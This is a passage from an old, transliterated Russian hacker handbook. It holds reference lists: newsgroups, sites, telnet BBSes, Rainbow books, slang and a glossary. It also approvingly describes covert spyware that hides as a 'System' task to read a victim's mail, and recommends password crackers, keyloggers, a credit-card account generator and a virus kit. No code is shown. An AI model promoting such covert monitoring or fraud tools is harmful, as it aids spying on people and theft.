informacii (naprimer dobavochnoe slovo "Subject:" skoree vsego pozvolit imet'
vsyu perepisku donora  bez zaglyadyvaniya na ego pochtovyj server).  Analogichnoe
primenenie mozhet najti i krakozyabla @.
     Sposob zapuska WinGrab na komp'yutere-donore --  ustanovka  programmy  s
diskety. Programma  principial'no ne sdelana  ni v vide troyanyaca, ni  v vide
virusa,  po  raznym  soobrazheniyam.  Odnako  ustanovka  programmy  s  diskety
optimizirovana  takim  obrazom,  chto  zanimaet vsego ot 10  do  35  sekund v
zavisimosti ot nalichiya na donore neobhodimyh bibliotek.
     Buduchi edinozhdy  ustanovlena,  programma  zapuskaetsya  kazhdyj  raz  pri
starte operacionnoj sistemy i vyglyadit  v spiske zadach kak  System.  Popytki
snyat'  zadachu  System,   estestvenno,   bezuspeshny,  chto  vvodit  neopytnogo
pol'zovatelya v blagoe zabluzhdenie.
     Primer fajla ../etc/passwd
     root:*:0:0:Charlie &:/root:/bin/csh
     toor:*:0:0:Bourne-again Superuser:/root:
     daemon:*:1:1:Owner of many system processes:/root:/nonexistent
     operator:*:2:20:System &:/usr/guest/operator:/bin/csh
     bin:*:3:7:Binaries Commands and Source,,,:/:/nonexistent
     games:*:7:13:Games pseudo-user:/usr/games:/nonexistent
     news:*:8:8:News Subsystem:/:/nonexistent
     man:*:9:9:Mister Man Pages:/usr/share/man:/nonexistent
     uucp:*:66:66:UUCP
pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
     xten:*:67:67:X-10 daemon:/usr/local/xten:/nonexistent
     nobody:*:65534:65534:Unprivileged user:/nonexistent:/nonexistent
     ftp:*:14:14:Anonymous FTP Admin:/usr/ftp:/bin/date
     Hakerskie konferencii
     Otmetim, chto istochnik kazhdoj postupayushchej stat'i registriruetsya. Poetomu
net  nikakogo smysla unichtozhat' stat'i UUnet. |to  informaciya dlya nachinayushchih
hakerov.  A dlya  bolee umudrennyh  opytom  otmetim, chto ne nuzhno zahodit'  v
sluchajnye  gruppy,  metit'  stat'i i  stirat'  soobshcheniya.  |to  nevezhlivo  i
bessmyslenno. Zachem pol'zovat'sya nesovershennymi metodami raboty Usenet?!
     alt.2600.hope.tech
     Hakery planety Zemlya.
     alt.comp.virus
     Spory po virusam.
     alt.cracks
     ZHarkie spory vzlomshchikov setej.
     alt.cyberpunk
     Uzkij krug kiberpankov.
     alt.cyberspace
     Kiberprostranstvo i kak v nem rabotat'.
     alt.dcom.telecom
     Spory otnositel'no telekommunikacij.
     alt.fan.lewiz
     Fen-klub Levisa De Pajna.
     alt.hackers
     Opisanie proektov.
     alt.hackers.malicious
     Dejstvitel'no merzkie tipy.
     alt.privacy.anon-server
     Anonimnye ataki na razlichnye servera.
     alt.radio.pirate
     Skrytye mehanizmy.
     alt.radio.scanner
     Skanirovanie radiogramm.
     alt.satellite.tv.europe
     Vse otnositel'no evropejskogo televideniya.
     alt.security
     Bezopasnost' komp'yuternyh setej.
     alt.security.keydist
     Obmen klyuchami dlya sistem deshifrovki.
     alt.security.pgp
     Pretty Good Privacy.
     alt.security.ripem
     Nelegal'naya pochta iz SSHA.
     comp.org.cpsr.announce
     Komp'yuternye professionaly.
     comp.org.cpsr.talk
     Samizdatovskie komp'yuternye izdaniya.
     comp.org.eff.news
     Novosti ot Electronic Frontiers Foundation.
     comp.protocols.tcp-ip
     Protokoly TCP i IP.
     comp.risks
     Publikacii i risk.
     comp.security.announce
     Anonsy ot CERT otnositel'no bezopasnosti.
     comp.security.misc
     Bezopasnost' setej i komp'yuterov.
     comp.security.unix
     Diskuscii po zashchite velikoj i moguchej UNIX.
     comp.virus
     Komp'yuternye virusy i bezopasnost'.
     rec.video.cable-tv
     Kabel'noe televidenie.
     sci.crypt.
     Razlichnye metody shifrovki/deshifrovki.
     Hakerskie sajty WWW
     http://www.outerlimits.net/lordsome/index.html
     http://web2.airmail.net/km/hfiles/free.htm
     http://resudox.net/bio/novell.html
     http://www.louisville.edu/wrbake01/hack2.html
     http://www.intersurf.com/~materva/files.html
     http://hightop.nrl.navy.mil/rainbow.html
     http://www.rit.edu/~jmb8902/hacking.html
     http://www.spatz.com/pecos/index.html
     http://pages.prodigy.com/FL/dtgz94a/files2.html
     http://www.2600.com
     http://att.net/dir800
     http://draco.centerline.com:8080/~franl/crypto.html
     http://everest.cs.ucdavis.edu/Security.html
     http://ice-www.larc.nasa.gov/WWW/security.html
     http://lOpht.com
     http://lOpht.com/~oblivion/IIRG.html
     http://underground.org
     http://www.alw.nih.gov/WWW/security.html
     http://www.aspentec.com/~frzmtdb/fun/hacker.html
     http://www.etext.org/Zines
     http://www.inderect.com/www/johnk/
     http://www.mgmua.com/hackers/index.html
     http://www.paranoia.com/mthreat
     http://www.paranoia.com/astrostar/fringe.html
     http://www.umcc.umich.edu/~doug/virus-faq.html
     http://www.wired.com
     http://all.net:8080
     http://alumni.caltech.edu/~dank/isdn
     http://aset.rsoc.rockwell.com
     http://aset.rsoc.rockwell.com/exhibit.html
     http://att.net/dir800
     http://ausg.dartmouth.edu/security.html
     http://csbh.mhv.net/dcypher/home.html
     http://cs.purdue.edu/coast/coast.html
     http://csrc.ncsl.nist.gov
     http://daemon.apana.org.au/~longi
     http://dhp.com/~pluvius
     http://everest.cs.ucdavis.edu/Security.html
     http://everest.cs.ucdavis.edu/slides/slides.html
     http://ftp.tamu.edu/~abr8030/security.html
     http://hightop.nrl.navy.mil/potpourri.html
     http://hightop.nrl.navy.mil/rainbow.html
     http://info.bellcore.com/BETSI/betsi.html
     http://infosec.nosc.mil/infosec.html
     http://l0pht.com
     http://l0pht.com/~oblivion/IIRG.html
     http://matrix.resnet.upenn.edu/rourke
     http://mindlink.jolt.com
     http://mls.saic.com
     http://motserv.indirect.com
     http://naic.nasa.gov/fbi/FBI_homepage.html
     http://nasirc.hq.nasa.gov
     http://obscura.com/~loki/
     http://ophie.hughes.american.edu/~ophie
     http://oregano.sl.pitt.edu/index.htm
     http://pages.ripco.com:8080/~glr/glr.html
     http://the-tech.mit.edu
     http://ucs.orst.edu:8001/mintro.html
     http://underground.org
     http://unixg.ubc.ca:780/~jyee
     http://w3.gti.net/safety
     http://wintermute.itd.nrl.navy.mil/5544.html
     http://wiz.plymouth.edu/~jay/underground.html
     http://www.2600.com
     http://www.8lgm.org
     http://www.aads.net
     http://www.alw.nih.gov/WWW/security.html
     http://www.aus.xanadu.com:70/1/EFA
     http://www.ba.com
     http://www.bell.com
     http://www.brad.ac.uk/~nasmith/index.html
     http://www.bst.bls.com
     http://www.c3.lanl.gov/~mcn
     http://www.cam.org/~gagnon
     http://www.cert.dfn.de
     http://www.cpsr.org/home
     http://www.cs.umd.edu/~lgas
     http://www.csd.harris.com/secure_info.html
     http://www.csl.sri.com
     http://www.datafellows.fi
     http://www.dct.ac.uk/~misb3cp/2600/faq.txt
     http://www.digicash.com/ecash/ecash-home.html
     http://www.dnai.com/~gui/index.html
     http://www.eecs.nwu.edu/~jmyers/ids/index.html
     http://www.eff.org/papers.html
     http://www.emap.co.uk/partners/racal-airtech
     http://www.ensta.fr/internet/unix/sys_admin
     http://www.etext.org/Zines
     http://www.fc.net/defcon
     http://www.fedworld.gov
     http://www.first.org/first
     http://www.gbnet.net/kbridge
     http://www.ic.gov
     http://www.io.org/~excels
     http://www.indirect.com/www/johnk
     http://www.magi.com/~vektor/linenoiz.html
     http://www.mcs.com/~candyman/under.html
     http://www.mpr.ca
     http://www.net23.com
     http://www.netresponse.com:80/zldf
     http://www.nist.gov
     http://www.ntt.jp
     http://www.pacbell.com
     http://www.paranoia.com/astrostar/fringe.html
     http://www.paranoia.com/mthreat
     http://www.planet.net/onkeld
     http://www.primenet.com/~insphrk
     http://www.primenet.com/~kludge/haqr.html
     http://www.qualcomm.com/cdma/wireless.html
     http://www.raptor.com/raptor/raptor.html
     http://www.research.att.com
     http://www.rsa.com
     http://www.satelnet.org/~ccappuc
     http://www.seas.upenn.edu/~rourkem
     http://www.service.com/cm/uswest/usw1.html
     http://www.shore.net/~oz/welcome.html
     http://www.spatz.com/pecos/index.html
     http://www.spy.org
     http://www.sri.com
     Hakerskie sajty FTP
     ftp.3com.com /pub/Orange-Book
     ftp.acns.nwu.edu /pub
     ftp.alantec.com /pub/tcpr
     ftp.armory.com /pub/user/kmartind
     ftp.armory.com /pub/user/swallow
     ftp.auscert.org.au /pub
     ftp.cs.ruu.nl /pub/SECURITY
     ftp.cs.uwm.edu /pub/comp-privacy
     ftp.csi.forth.gr /pub/security
     ftp.csl.sri.com /pub/nides
     ftp.csn.org /mpj
     ftp.digex.net /pub/access/dunk
     ftp.eff.org /pub/Publications/CuD
     ftp.fc.net /pub/deadkat
     ftp.fc.net /pub/defcon
     ftp.fc.net /pub/defcon/BBEEP
     ftp.fc.net /pub/phrack
     ftp.funet.fi /pub/doc/CuD
     ftp.gate.net /pub/users/laura
     ftp.gate.net /pub/users/wakko
     ftp.giga.or.at /pub/hacker
     ftp.greatcircle.com /pub/firewalls
     ftp.IEunet.ie /pub/security
     ftp.inoc.dl.nec.com /pub/security
     ftp.io.org /pub/users/gmouser
     ftp.lava.net /users/oracle/
     ftp.lerc.nasa.gov /security
     ftp.llnl.gov /pub
     ftp.luth.se /pub/unix/security
     ftp.mcs.anl.gov /pub/security
     ftp.microserve.net /ppp-pop/strata/mac
     ftp.near.net /security/archives/phrack
     ftp.netcom.com /pub/br/bradleym
     ftp.netcom.com /pub/da/daemon9
     ftp.netcom.com /pub/fi/filbert
     ftp.netcom.com /pub/le/lewiz
     ftp.netcom.com /pub/va/vandal
     ftp.netcom.com /pub/wt/wtech
     ftp.netcom.com /pub/zz/zzyzx
     ftp.ocs.mq.edu.au /PC/Crypt
     ftp.ox.ac.uk /pub/comp/security
     ftp.ox.ac.uk /pub/crypto
     ftp.ox.ac.uk /pub/wordlists
     ftp.paranoia.com /pub/toneloc
     ftp.primenet.com /users/i/insphrk
     ftp.primenet.com /users/k/kludge
     ftp.primenet.com /users/s/scuzzy
     Luchshij hakerskij soft
     CHEAT ENGiNE 2.5
     Prostaya programma dlya vzloma igr. Sozdaet klassnye i bystrye patchi.
     Cheat Machine 2.02
     Programma  dlya legkogo prohozhdeniya igr. Podderzhka  okolo  300 izvestnyh
igr. Solyusheny, taktika, kody, patchi, utility.
     CrackAid 3.39
     Snyatie zashchity s igr.
     Crack Master 2.5
     Vzlom zashchit prisoedinitel'nogo tipa s naibolee populyarnyh igr.
     Neverlock Spring 95
     Vzlom zashchity s bolee 400 igr.
     The PATCHER 6.5
     Snyatie zashchity ot kopirovaniya s bolee, chem 100 izvestnyh igrushek.
     Unlimited Cheats 3.0
     Obman luchshih igr mira. Velikolepnyj interfejs. Rabota s mysh'yu.
     BRUTE 2.0
     Instrumentarij dlya vzloma parolej UNIX.
     Claymore 1.0
     Instrumentarij  dlya  vzloma  parolej  sistemy  Microsoft   Windows.  Po
bol'shomu schetu eta ves'ma udobnaya  programma pozvolyaet vzlomat'  prakticheski
lyuboj parol'. Trebuet nalichiya standartnoj biblioteki VBRUN300.DLL
     Cracker Jack 1.4
     Instrumentarij dlya vzloma parolej sistemy UNIX.
     Glide
     Znamenityj soft dlya vzloma PWL-fajlov sistemy Microsoft Windows.
     GUESS 2.1
     Eshche  odin  instrumentarij  dlya vzloma parolej  sistemy UNIX.  Pozvolyaet
podklyuchit' slovar'.
     Hades 1.0
     Skanirovanie i rasshifrovka parolej.
     Killer Cracker 9.5
     Prostoj vzlomshchik parolej dlya MS DOS.
     NEWHACK 2.0
     Soft, pozvolyayushchij obnovlyat' fajl parolej.
     PCUPC 2.01
     Instrumentarij dlya vzloma parolej sistemy UNIX.
     XIT 2.0
     Instrumentarij dlya vzloma parolej sistemy UNIX.
     CRACKer for ZIP-files 2.0
     Vzlomshchik parolej v ZIP-fajlah.
     Fast ZIP Cracker 1.4
     Vzlomshchik parolej v ZIP-fajlah. Ispol'zuet slovar' Brute Force.
     MS CD-Key Generator 95
     Sozdanie registracionnyh klyuchej dlya Microsoft Office i Windows 95.
     Nagbuster 1.2d
     Polnost'yu avtomaticheskaya  programma,  kotoraya  udalyaet  registracionnyj
musor iz mnogih shareware-programm.
     NONAG2
     Izyashchnaya  programmka, kotoraya  udalyaet registracionnyj  musor  iz mnogih
shareware-programm.
     Word Password Cracker
     Vzlom parolej v dokumentah Microsoft Word for Windows.
     Windows Screen Saver Cracker
     Vzlomshchik zaparollirovannyh ekrannyh zastavok.
     ZipCrack 1.0
     Prostoj vzlomshchik parolej v ZIP-fajlah.
     HEdit32 1.2
     Redaktor  dvoichnyh  fajlov.  Neogranichennyj   razmer  fajla,  podderzhka
mehanizma drag-and-drop, poisk teksta, vyborka shriftov, podderzhka clipboard.
     Global Security 32-Bit 1.0
     Programma,  obespechivayushchaya  bezopasnost'  peredavaemyh   dannyh.  Bolee
krutaya, chem znamenitaya PGP.
     Hide and Seek 4.1
     Skryvaet dannye v fajlah GIF.
     ParadoX 1.01
     Programma dlya shifrovaniya fajlov dannyh.
     Puffer 2.0
     Programma dlya shifrovaniya fajlov dannyh i soobshchenij elektronnoj pochty.
     KOH
     Disk  Encryption System.  Zashchita zhestkogo diska  i  floppov posredstvom
tehnologii shifrovaniya IDEA na osnove 156-bitovogo klyucha.
     Steganos 1.4
     Ochen'  udobnaya  programma,  pozvolyayushchaya  spryatat'  fajl v drugoj  fajl.
Podderzhka  formatov  BMP,  VOC, WAV i  ASCII, vklyuchaya  dlinnye imena  fajlov
sistemy Windows 95.
     S-Tools 4.0
     Maskirovka dannyh v zvukovyh ili graficheskih fajlah.
     Private Idaho
     SHifrovka lyubyh soobshchenij elektronnoj pochty.
     Speak Freely
     Soft, pozvolyayushchij zashifrovat' komp'yuter, ispol'zuya chelovecheskij golos.
     Apex 1.00
     Osnovnaya  programma,  pozvolyayushchaya   sozdavat'  fiktivnyj  dostup  cherez
prostoj nabor telefonnogo nomera.
     BlueBEEP!
     Luchshaya tonovaya zvonilka.
     CyberPHREAK 1.0
     Zvonilka, rabotayushchaya  v fonovom rezhime.  Podderzhka  naibolee populyarnyh
zvukovyh kart.
     Fear's Phreaker Tools 2.3
     Frikerskaya utilita dlya tonov Red Box Tones. Rabotaet v Windows.
     Phone Tag 1.3
     Tonovaya zvonilka dlya Windows.
     PhreakMaster 1.0
     Udobnaya zvonilka.
     ToneLoc 1.10
     Udobnyj   DOS-terminal,   pozvolyayushchij   ves'ma   effektivno   atakovat'
komp'yuternye seti.
     ToneLoc Utilities
     Utility k ToneLoc.
     Prostejshij   terminal,   pozvolyayushchij   ves'ma    effektivno   atakovat'
komp'yuternye seti.
     Z-Hacker 3.21
     Velikolepnaya frikerskaya programma.
     Bomb 2.0
     Soft, pozvolyayushchij ves'ma effektivno posylat' v set' fal'shivye soobshcheniya
elektronnoj pochty.
     CreditMaster 4.0
     Generaciya fal'shivogo ekkaunta dlya kreditnoj kartochki.
     FakeCD 1.0
     Immitaciya  ustrojstva CD ROM  posredstvom sozdaniya otdel'noj direktorii
na zhestkom diske.
     IP-Scan 1.02
     Ishodnik na C dlya skanirovaniya adresov IP.
     KeyLogger 95
     Programma,  pozvolyayushchaya  zapisyvat'  v  otdel'nyj  fajl  lyubye  nazhatiya
klaviatury.
     KeyTrap 3.0
     Ochen'  effektivnaya programma,  pozvolyayushchaya zapisyvat' v otdel'nyj  fajl
lyubye nazhatiya klaviatury.
     No Where Utilities 2.0
     Trinadcat' hakerskih utilit.
     News You Can Use 6.0
     Odno iz luchshih elektronnyh izdanij hakerskih sovetov i rekomendacij.
     The Pirates Friend 2.6
     Kollekciya serijnyh nomerov.
     UNP 4.10
     Razarhivirovanie  fajlov,  szhatyh  programmami  DIET,  EXEPACK,  LZEXE,
PKLITE i TASM.EXE
     TLINK.EXE
     Mgnovennoe proizvodstvo virusov.
     Kit 1.0
     Inficirovanie  EXE-fajlov,  proizvodstvo  troyanskih  konej,  shifrovanie
vsego i vsya, sozdanie fiktivnyh oshibok obrabotki, infekciya fajla COMMAND.COM
i mnogoe drugoe.
     Nebol'shoj spisok setevyh "ulybok"
     :-)
     Samaya obychnaya hohma.
     ;-)
     Hohma s podmigivaniem.
     :-(
     Hmuraya fizionomiya.
     :-I
     Nikakoe vyrazhenie lica.
     :-/
     Skepticheskoe vyrazhenie.
     :-X
     Molchit.
     :-Q
     Kurit.
     :-R
     Vysovyvaet yayk.
     :-{
     Ucatyj sobesednik.
     B-)
     Noshu ochki.
     %-)
     Dolgo smotryu na etot ekpan.
     Spisok rossijskih DNIC
     2500 ROSPAC
     2501 POSPRINT
     2502 IASNET
     2503 MMTEL
     2504 INFOTEL
     2506 ROSNET
     2508 TRANSINFORM
     2510 SOVAMNET
     2511 |DITRANS
     2512 T|KOS
     2513 PTT-TELEPORT
     Spisok BBS, rabotayushchih chepez telnet
     ADDICTED chatline
     telnet sun1.gwent.ac.uk 6666
     AIDS Database
     telnet debra.dgbt.doc.ca 3000
     Air Pollution BBS
     telnet ttnbbs.rtpnc.epa.gov
     Amateur Callsign Server
     telnet cs.buffalo.edu 2000
     Archeological Database
     telnet cast.uark.edu (login:nadb)
     Archie ftp directory search
     telnet archie.sura.net (login: qarchie)
     Aviation Weather
     telnet duats.gtefsd.com
     Bible Search
     telnet quake.think.com (login: WAIS)
     Book Stacks Unlimited
     telnet books.com
     Bridge
     telnet 140.117.11.33 (login okbridge)
     CapAccess Network
     telnet cap.gwu.edu
     CASS - Space Studies
     telnet cass.jsc.nasa.gov (login: cass pw: online)
     CD Connection
     telnet cdconnection.com
     Chess
     telnet 128.111.246.2 5000
     CompuServe
     telnet compuserve.com
     Connection music store
     telnet zen.holonet.net (login: cdc)
     Dictionary
     telnet 129.79.254.191 2627
     Diku-MUD
     telnet skypoint.com 4000
     Employment database
     telnet career.com
     Epilepsy Database
     telnet debra.dgbt.doc.ca 3000
     Fedworld BBS
     telnet fedworld.gov
     FIFE Satellite dB
     telnet pldsg3.gsfc.nasa.gov (login: FIFEUSER)
     Free-Net Buffalo
     telnet freenet.buffalo.edu
     Free-Net Cleveland
     telnet freenet-in-a.cwru.edu
     Free-Net Dayton
     telnet 130.108.128.74
     Games
     telnet castor.tat.physik.uni-tuebingen.de
     Geography Server
     telnet martini.eecs.umich.edu 3000
     Gopher Public server
     telnet consultant.micro.umn.edu
     GSA contract info
     telnet netmark.com (login: netmark)
     Land Use maps
     telnet 152.61.192.54
     Law Library
     telnet 137.113.10.35
     MLB Schedules
     telnet culine.colorado.edu 862
     NBA Schedules
     telnet culine.colorado.edu 859
     NBS Time Service
     telnet nessie.cc.wwu.edu (login: LIBS)
     Netline Flagship BBS
     telnet fcsbbs.netline.co.za
     NTIA Information
     telnet ntiabbs.ntia.doc.gov
     Periodic Table
     telnet camms2.caos.kun.nl
     Periodicals Index/reprints
     telnet database.carl.org
     Poetry 17-18C dB
     telnet bcmsv.leeds.ac.uk (login: bcmsv)
     Quotes
     telnet astro.temple.edu 12345
     Shakespeare Database
     telnet library.dartmouth.edu
     Smiley database
     telnet twinbrook.cis.uab.edu 3399
     Spanish-English Dictionary
     telnet gopher.sc.ehu.es 4444
     Stock Market Reports
     telnet 192.160.13.1
     Stock Market Reports
     telnet a2i.rahul.net
     Stock Quotes ($)
     telnet quote.com
     Subway Maps
     telnet metro.jussieu.fr 10000
     SVPAL
     telnet svpal.org
     Tallahasee Free-Net
     telnet freenet.fsu.edu
     Telephone Directories
     telnet dfw.net
     TinyTIM MUD
     telnet yay.tim.org 5440
     TrekMOO MUD
     telnet 192.204.120.2 2499
     TrekMOO MUD
     telnet trekmoo.microserve.com 2499
     TrekMOO MUD+
     telnet 192.204.120.2 2499
     TV & Radio Transcripts
     telnet pac.carl.org
     USA Today
     telnet 129.22.8.51
     USGS Land Info System
     telnet glis.cr.usgs.gov
     WAIS
     telnet quake.think.com (login: wais)
     Spisok vseh knig Rainbow
     Orange 1
     D.O.D. Trusted Computer Systems.
     Green
     D.O.D. Password Management.
     Yellow
     Computer Security Requirements.
     Yellow 2
     Computer Security Requirements.
     Tan
     Understanding Audit In Trusted Systems.
     Bright Blue
     Trusted Product Evaluation.
     Neon Orange
     Understanding Discretionary Access.
     Teal Green
     Glossary Of Computer Terms.
     Orange 2
     Understanding Configurations.
     Red
     Interpretation Of Evaluation.
     Burgundy
     Understanding Design Documentation.
     Dark Lavender
     Understanding Trusted Distrobution.
     Venice Blue
     Computer Security Sub-Systems.
     Aqua
     Understanding Security Modeling.
     Dark Red
     Interpretations Of Environments.
     Pink
     Rating Maintenence Phase.
     Purple
     Formal Verification Systems.
     Brown
     Understanding Trusted Facilities.
     Yellow-Green
     Writing Trusted Facility Manuals.
     Light Blue
     Understanding Identification And Authentication
     In Trusted Systems.
     Blue
     Product Evaluation Questionaire.
     Gray
     Selecting Access Control List.
     Lavander
     Data Base Management Interpretation.
     Yellow 3
     Understanding Trusted Recovery.
     Bright Orange
     Understanding Security Testing.
     Purple 1
     Guide To System Procurement.
     Purple 2
     Guide To System Procurement.
     Purple 3
     Guide To System Procurement.
     Purple 4
     Guide To System Procurement.
     Green
     Understanding Data Remanence
     Hot Peach
     Writing Security Features.
     Turquiose
     Understanding Information Security.
     Violet
     Controlled Access Protection.
     Light Pink
     Understanding Covert Channels.
     Hakerskie akronimy
     ACL
     Access Control List
     AN
     Associated Number
     ARSB
     Automated Repair Service Bureau
     ATH
     Abbreviated Trouble History
     BOC
     Bell Operating Company
     BOR
     Basic Output Report
     BOSS
     Business Office Servicing System
     CA
     Cable
     COE
     Central Office Equipment
     CMC
     Construction Maintenance Center
     CNID
     Calling Number IDentification
     CO
     Central Office
     DDD
     Direct Distance Dialing
     ECC
     Enter Cable Change
     LD
     Long Distance
     LMOS
     Loop Maintenance Operations System
     MLT
     Mechanized Loop Testing
     NPA
     Numbering Plan Area
     POTS
     Plain Old Telephone Service
     RBOC
     Regional Bell Operating Company
     RSB
     Repair Service Bureau
     SS
     Special Service
     TAS
     Telephone Answering Service
     TH
     Trouble History
     TREAT
     Trouble Report Evaluation and Analysis Tool
     LOD
     Legion of Doom
     HFC
     Hell Fire Club
     TNO
     The New Order
     ACiD
     Ansi Creators in Demand
     Cci
     Cybercrime International
     FLT
     Fairlight
     iCE
     Insane Creators Enterprise
     iNC
     International Network of Crackers
     NTA
     The Nocturnal Trading Alliance
     PDX
     Paradox
     PE
     Public Enemy
     PSY
     Psychose
     QTX
     Quartex
     RZR
     Razor (1911)
     S!P
     Supr!se Productions
     TDT
     The Dream Team
     THG
     The Humble Guys
     THP
     The Hill People
     TRSI
     Tristar Red Sector Inc.
     UUDW
     Union of United Death Workers
     Slovar' yunogo hakera
     Bit
     Minimal'naya edinica izmereniya informacii (0 ili 1).
     Polubajt
     4 bita.
     Bajt
     Tozhe, chto i bit, tol'ko v 8 raz bol'she.
     Kilo
     Tozhe, chto i bajt, tol'ko v 1024 raza bol'she.
     Meg
     Tozhe, chto i kilo, tol'ko v 1024 raza bol'she.
     Gig
     Tozhe, chto i meg, tol'ko v 1024 raza bol'she.
     Haker
     CHelovek, ne myslyashchij sebya bez komp'yutera.
     Mozgi
     Operativnaya pamyat' komp'yutera. Izmeryaetsya v kilo/megabajtah.
     Linejka
     Nabor mikroshem v kolichestve vos'mi shtuk.
     Kasha
     Cach-pamyat'.
     ZHelezo
     Hardware.
     Bebeska
     Bulleten Board System.
     Vint
     Vinchester. ZHestkij disk. Nositel' informacii.
     Matras
     Vinchester firmy MAXTOR.
     Trehdyujmovka i pyatidyujmovka
     Gibkij magnitnyj disk razmerom v 3 i 5 dyujmov sootvetstvenno.
     Flopper
     Ustrojstvo dlya schityvaniya informacii s gibkih diskov.
     Komp
     Personal'nyj komp'yuter.
     Klava
     Klaviatura. Klacnut' pedal'yu, toptat' knopku, nazhat' na klavishu.
     Progsy
     Komp'yuternye programmy.
     Zakinut' na disk
     Zapisat' informaciyu na magnitnyj nositel'.
     Korobok
     Korpus komp'yutera.
     Gama
     Igra.
     Kreknut', lomanut', haknut', vzorvat' gamu
     Vskryt' igru i izmenit' v nej dannye po svoemu usmotreniyu.
     Kryakalka
     Programma dlya vskrytiya programm.
     Blaster, Liba, Gus'
     Tipy muzykal'nyh adapterov.
     Bima
     Narodnoe nazvanie komp'yutera firmy IBM.
     Mak
     Narodnoe nazvanie komp'yutera firmy Apple Macintosh.
     Dvojka, trojka, chetverka
     Pervye cifry modelej personal'nyh komp'yuterov firmy IBM.
     Hata
     Komp'yuter firmy IBM klassa XT.
     Pentyuh
     Komp'yuter IBM Pentium.
     Virusyaka
     Komp'yuternyj virus.
     CHajnik
     CHelovek, ne smyslyashchij pochti nichego v komp'yuternyh tehnologiyah.
     Biper, spiker, bzhichek
     Vstroenyj dinamik.
     SHtampik, dryuker, pechatalka
     Printer.
     Otshtampovat' tekst
     Otpechatat' tekst na printere.
     Mikrohi
     Mikroshemy.
     Bitye mikrohi
     Negodnye sozhzhenye mikroshemy.
     Videokarta, vika
     Plata videoadaptera.
     Plitka
     Karta.
     Dipik
     DIP-pereklyuchatel'  (na  zadnih  panelyah  printerov,  videomagnitofonov,
videokart i t.d.).
     Nabit', nastukat' tekst
     Nabrat' tekstovyj fajl
     Capik
     Cifrovoj analogovyj preobrazovatel'.
     Sbros, pimpa
     Knopka Reset na komp'yutere. Sbrosit' komp'yuter, strajknut' pimpu, nazhav
Reset, ochistit' operativnuyu pamyat'.
     Kopik
     Soprocessor (muzykal'nyj, matematicheskij).
     Procik
     Prosto processor.
     Komp'yuter zavis
     Sostoyanie mashiny, pri kotorom rabotu prodolzhat' nevozmozhno.
     Nasil'nik
     Programmist-sistemshchik, rabotayushchij na yazyke S.
     Makrushnik
     Programmist-sistemshchik, rabotayushchij na makroassemblere.
     SisOp
     Sistemnyj operator BBS.
     Sosiska
     Plohoj SisOp.
     Sisopka
     P'yanka sistemnyh operatorov.
     Sosisnik
     P'yanka plohih SisOpov.
     T-mylo
     Pochtovaya programma T-MAIL.
     Frodo
     Pochtovaya programma Front Door.
     YUzer
     Pol'zovatel'.
     Golyj ded
     Redaktor pochty Gold Edit.
     SHnurok
     Lokal'naya set'.
     Sidishnik, sidyuk
     Nakopitel' na lazernyh diskah CD ROM.
     Strujnik
     Strujnyj printer.
     Parovoz
     Programma szhatiya dannyh v real'nom vremeni.
     Doska
     Diskovaya operacionnaya sistema.
     Fortochki
     Operacionnaya sistema Microsoft Windows.
     Durdos
     operacionnaya sistema DR-DOS.
     TruboPaskakal'
     YAzyk Turbo Pascal.
     Lisa
     Baza dannyh Fox Pro.
     Poloter
     Plotter (grafopostroitel').
     Zalit'/slit'
     Upload/Download. Zapisat'/spisat' fajly.
     Primat
     Prikladnoj matematik.
     Sovok
     Muzykal'naya psevdopristavka Covox.
     Bag, glyuk
     Oshibka (sboj) v programme.
     Lapa
     Perenosnoj komp'yuter.
     ZHuk, shurshun
     Ventilyator v bloke pitaniya.
     Kuler, Karlson
     Ventilyator 486 processora.
     MuMu
     Mul'timedia.
     Drova
     Mashina-parodiya na normal'nyj komp'yuter. (Poisk, ES |VM i t.d.).
     Sboj
     Nenormal'naya   rabota   komp'yutera,   chashche   vsego    vstrechaetsya    na
mashinah-drovah.
     Goga
     Russkij variant slova error.
     Fajlo
     Fajl.
     Mejlo
     Pis'mo.
     Myshatina
     Manipulyator tipa Mouse.
     Kopirnut'
     Ckopirovat' chto-libo.
     Konnektit'sya, zhuzhzhat'
     Cvyazyvat'sya modemami.
     Kloki
     Cistemnye chasy.
     Konec, kobel', shlejf
     Kabel' sopryazheniya.
     Tormozistor
     Tranzistor.
     Materinka, mamka
     Motherboard (osnovnaya plata).
     SHirinka
     Plata rasshireniya pamyati.
     Simy
     Mikroshemy pamyati SIMM.
     Sipy
     Mikroshemy pyamyati SIPP.
     Baton
     Lyubaya knopka (button).
     Volshebnyj baton
     Knopka magic button komp'yutera ZX Spectrum.
     Mul'tyaha
     Plata, otvechayushchaya za obrabotku standartnyh portov vvoda/vyvoda.
     Helpar'
     Pomoshchnik.
     Poletel
     Obraznoe vyrazhenie, harakterizuyushchee polomku chego-libo.
     Gify
     Graficheskie fajly s rasshireniem .GIF.
     Fliki
     Fajly-klipy s rasshireniem .FLI.
     Mordy
     Muzykal'nye fajly s rasshireniem .MOD.
     Beguchka
     Begushchaya strochka.
     De-Ze
     Rezhim    vykachki    fajlov,    pri    kotorom    ispol'zuetsya    ZMODEM
(DownLoad/ZModem).
     Netvar'
     Operacionnaya sistema Netware.
     Gorelye drova
     Graficheskij redaktor CorelDraw.
     Noski
     Tablica kodirovki ASCII.
     CHekist
     Testovaya programma Checkit.
     Pilit' diski
     Popytka chteniya informacii s plohih diskov.
     Pen'-info
     Derevo katalogov Norton Commander Treeinfo.
     Veshalka
     Tablica vektorov preryvanij.
     |nurez
     Programma vosstanovleniya sluchajno stertyh fajlov.
     Tolkovyj slovar'
     Access level
     Uroven' dostupa.
     Access Privileges
     Dostup kak k samim papkam, tak i k vozmozhnosti ih modificirovat'.
     Access
     Dostup k seti.
     Active Channel
     Uzel Web, avtomaticheski postavlyaemyj na rabochij stol pol'zovatelya.
     ActiveX
     Termin  programmnogo  interfejsa   tehnologii  Microsoft,   pozvolyayushchej
razrabotchikam  sozdavat'  interaktivnoe  soderzhimoe dlya  WWW,  a  takzhe  dlya
komponentov  programmnogo  obespecheniya,   napisannyh  na  razlichnyh  yazykah.
Osnovnye elementy tehnologii ActiveX -- COM i DCOM.
     Address
     Unikal'nyj kod s informaciej, nahodyashchejsya v fajle konkretnoj seti.
     AGP
     Accelerated Graphics Port.
     Alias
     Psevdonim (imya, metka). Ves'ma izvestnaya veshch' v komp'yuterah  Macintosh.
V  bolee  shirokom smysle, --  metka,  ispol'zuyushchayasya dlya  ukazaniya vypolnit'
kakoe-libo dejstvie.
     Anchor
